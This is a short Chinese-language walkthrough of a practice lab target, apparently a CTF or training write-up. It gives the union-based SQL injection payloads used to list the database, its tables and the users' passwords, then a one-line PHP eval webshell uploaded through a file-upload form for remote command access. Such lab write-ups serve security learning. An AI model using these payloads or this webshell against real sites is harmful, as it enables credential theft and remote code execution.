第一步查找ip
通过御剑扫描到IP进入尝试

成功找到靶场

步骤二来到这个靶场注册登录
进来点一下提交出来书名

只有一个框框那就来试试sql注入
1’ and 1=2 --+
然后查看数据库
-1' union select database(),2,3 #

查看数据库表名
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking' #

这里查看users表的用户和密码
-1' union select group_concat(user),group_concat(pasword),3 from users#

可以看到密码是加密后的拿到密码进行解密
(这里我用的superadmin用户)

回去登录进去看见有个上传文件的地方

上传一句话木马 <?php phpinfo();eval($_POST['cmd']);?> 写入1.php上传后去看它的目录里边有没有

有就说明写进去了然后去连接webshell





















